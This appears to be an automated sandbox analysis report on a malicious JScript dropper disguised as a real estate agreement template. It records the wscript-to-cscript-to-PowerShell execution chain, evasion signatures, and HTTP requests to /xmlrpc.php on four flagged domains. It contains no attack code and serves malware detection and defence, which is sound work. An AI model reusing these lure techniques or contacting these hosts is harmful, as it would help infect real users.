Windows Analysis Report
real estate co ownership agreement template 43632.js

Overview

General Information

Sample name: real estate co ownership agreement template 43632.js
Analysis ID: 1436909
MD5: e4c20aa2c3a182ea923c56200099bcc7
SHA1: e43d499f2ac4a5d52629226e479464806049bb02
SHA256: 81aaaa98308c50ff79d2680d0c1840a05e3ac3c0255166da047ed77073dc8458

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for domain / URL
Yara detected Html Dropper
Loading BitLocker PowerShell Module
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • wscript.exe (PID: 6948 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\real estate co ownership agreement template 43632.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 4912 cmdline: C:\Windows\system32\wscript.EXE DEVELO~1.JS MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cscript.exe (PID: 6548 cmdline: "C:\Windows\System32\cscript.exe" "DEVELO~1.JS" MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
      • conhost.exe (PID: 1100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6768 cmdline: powershell MD5: 04029E121A0CFA5991749937DD22A1D9)
  • wscript.exe (PID: 6808 cmdline: C:\Windows\system32\wscript.EXE DEVELO~1.JS MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cscript.exe (PID: 6236 cmdline: "C:\Windows\System32\cscript.exe" "DEVELO~1.JS" MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
      • conhost.exe (PID: 6272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3952 cmdline: powershell MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
Source: real estate co ownership agreement template 43632.js
Rule: JoeSecurity_HtmlDropper
Description: Yara detected Html Dropper
Author: Joe Security

    System Summary

    Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\real estate co ownership agreement template 43632.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\real estate co ownership agreement template 43632.js", CommandLine|base64offset|contains: zZ, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\real estate co ownership agreement template 43632.js", ProcessId: 6948, ProcessName: wscript.exe
    Source: Process started | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: Command: C:\Windows\system32\wscript.EXE DEVELO~1.JS, CommandLine: C:\Windows\system32\wscript.EXE DEVELO~1.JS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Windows\system32\wscript.EXE DEVELO~1.JS, ProcessId: 4912, ProcessName: wscript.exe
    Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\real estate co ownership agreement template 43632.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\real estate co ownership agreement template 43632.js", CommandLine|base64offset|contains: zZ, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\real estate co ownership agreement template 43632.js", ProcessId: 6948, ProcessName: wscript.exe
    Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell, CommandLine: powershell, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cscript.exe" "DEVELO~1.JS", ParentImage: C:\Windows\System32\cscript.exe, ParentProcessId: 6548, ParentProcessName: cscript.exe, ProcessCommandLine: powershell, ProcessId: 6768, ProcessName: powershell.exe
    No Snort rule has matched

    AV Detection

    Source: https://weissenbach-pr.de/xmlrpc.php | Avira URL Cloud: Label: malware
    Source: weissenbach-pr.de | Virustotal: Detection: 10%
    Source: https://weissenbach-pr.de/xmlrpc.php | Virustotal: Detection: 10%
    Source: unknown | HTTPS traffic detected: 91.198.66.211:443 -> 192.168.2.7:49708 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 78.46.3.78:443 -> 192.168.2.7:49709 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 195.28.10.122:443 -> 192.168.2.7:49710 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 153.127.91.146:443 -> 192.168.2.7:49712 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 153.127.91.146:443 -> 192.168.2.7:49711 version: TLS 1.2
    Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
    Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
    Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
    Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
    Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
    Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
    Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
    Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
    Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
    Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
    Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
    Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
    Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
    Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
    Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
    Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
    Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation

    Software Vulnerabilities

    Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: global traffic | HTTP traffic detected: GET /xmlrpc.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 | Cookie: 1C5A6FBD41, 1C5A6FBD411, 1C5A6FBD412, 1C5A6FBD413, 1C5A6FBD414 (base64-encoded cookie values omitted) | Host: naturalanimals.net | Connection: Close
    Source: global traffic | HTTP traffic detected: GET /xmlrpc.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 | Cookie: 1C5A6FBD41, 1C5A6FBD411, 1C5A6FBD412, 1C5A6FBD413, 1C5A6FBD414 (base64-encoded cookie values omitted) | Host: weissenbach-pr.de | Connection: Close
    Source: global traffic | HTTP traffic detected: GET /xmlrpc.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 | Cookie: 1C5A6FBD41, 1C5A6FBD411, 1C5A6FBD412, 1C5A6FBD413, 1C5A6FBD414 (base64-encoded cookie values omitted) | Host: memar98.com | Connection: Close
    Source: global traffic | HTTP traffic detected: GET /xmlrpc.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 | Cookie: 1C5A6FBD41, 1C5A6FBD411, 1C5A6FBD412, 1C5A6FBD413, 1C5A6FBD414 (base64-encoded cookie values omitted) | Host: tennoji-law-uranai.com | Connection: Close
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic | DNS traffic detected: DNS query: naturalanimals.net
    Source: global traffic | DNS traffic detected: DNS query: weissenbach-pr.de
    Source: global traffic | DNS traffic detected: DNS query: memar98.com
    Source: global traffic | DNS traffic detected: DNS query: tennoji-law-uranai.com
    Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx | Date: Mon, 06 May 2024 16:41:41 GMT | Content-Type: text/html; charset=iso-8859-1 | Content-Length: 199 | Connection: close | Vary: Accept-Encoding
    Source: real estate co ownership agreement template 43632.js | String found in binary or memory: http://my.opera.com/emoller/blog/2011/12/20/requestanimationframe-for-smart-er-animating
    Source: real estate co ownership agreement template 43632.js | String found in binary or memory: http://paulirish.com/2011/requestanimationframe-for-smart-animating/
    Source: real estate co ownership agreement template 43632.js | String found in binary or memory: http://peltiertech.com/how-excel-calculates-automatic-chart-axis-limits/
    Source: real estate co ownership agreement template 43632.js | String found in binary or memory: http://raphaeljs.com/analytics.js)
    Source: real estate co ownership agreement template 43632.js | String found in binary or memory: http://stackoverflow.com/questions/1573053/javascript-function-to-convert-color-names-to-hex-codes
    Source: real estate co ownership agreement template 43632.js | String found in binary or memory: http://www.cs.rit.edu/~ncs/color/t_convert.html
    Source: real estate co ownership agreement template 43632.js | String found in binary or memory: http://www.w3schools.com/HTML/html_colornames.asp
    Source: real estate co ownership agreement template 43632.js | String found in binary or memory: http://www.w3schools.com/svg/svg_path.asp
    Source: real estate co ownership agreement template 43632.js | String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/SVG/Attribute/d
    Source: real estate co ownership agreement template 43632.js | String found in binary or memory: https://github.com/miguelmota/base64toblob/blob/master/base64toblob.js
    Source: real estate co ownership agreement template 43632.js | String found in binary or memory: https://github.com/nhn/tui.chart
    Source: real estate co ownership agreement template 43632.js | String found in binary or memory: https://github.com/nhn/tui.chart/issues/56)
    Source: real estate co ownership agreement template 43632.js | String found in binary or memory: https://i-msdn.sec.s-msft.com/dynimg/IC267997.gif
    Source: real estate co ownership agreement template 43632.js | String found in binary or memory: https://www.google-analytics.com/collect
    Source: real estate co ownership agreement template 43632.js | String found in binary or memory: https://www.win.tue.nl/~vanwijk/stm.pdf
    Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownHTTPS traffic detected: 91.198.66.211:443 -> 192.168.2.7:49708 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 78.46.3.78:443 -> 192.168.2.7:49709 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 195.28.10.122:443 -> 192.168.2.7:49710 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 153.127.91.146:443 -> 192.168.2.7:49712 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 153.127.91.146:443 -> 192.168.2.7:49711 version: TLS 1.2

    System Summary

    Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
    Source: C:\Windows\System32\wscript.exe | COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
    Source: C:\Windows\System32\wscript.exe | Process Stats: CPU usage > 49%
    Source: real estate co ownership agreement template 43632.js | Initial sample: Strings found which are bigger than 50
    Source: classification engine | Classification label: mal92.troj.expl.evad.winJS@13/9@4/4
    Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\com.adobe.dunamis\Golf Club Repair.dat
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6272:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1100:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fffj2uvs.1yt.ps1
    Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
    Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\real estate co ownership agreement template 43632.js"
    Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE DEVELO~1.JS
    Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "DEVELO~1.JS"
    Source: C:\Windows\System32\cscript.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE DEVELO~1.JS
    Source: C:\Windows\System32\cscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell
    Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "DEVELO~1.JS"
    Source: C:\Windows\System32\cscript.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell
    Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "DEVELO~1.JS"
    Source: C:\Windows\System32\cscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell
    Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "DEVELO~1.JS"
    Source: C:\Windows\System32\cscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell
    Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: taskschd.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: xmllite.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: pcacli.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: sfc_os.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: version.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: sxs.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: jscript.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: iertutil.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: amsi.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: userenv.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: profapi.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: wldp.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: msasn1.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: msisip.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: wshext.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: scrobj.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: mpr.dll
    Source: C:\Windows\System32\cscript.exe | Section loaded: scrrun.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: pcacli.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
    Source: C:\Windows\System32\wscript.exe | Section loaded: sfc_os.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
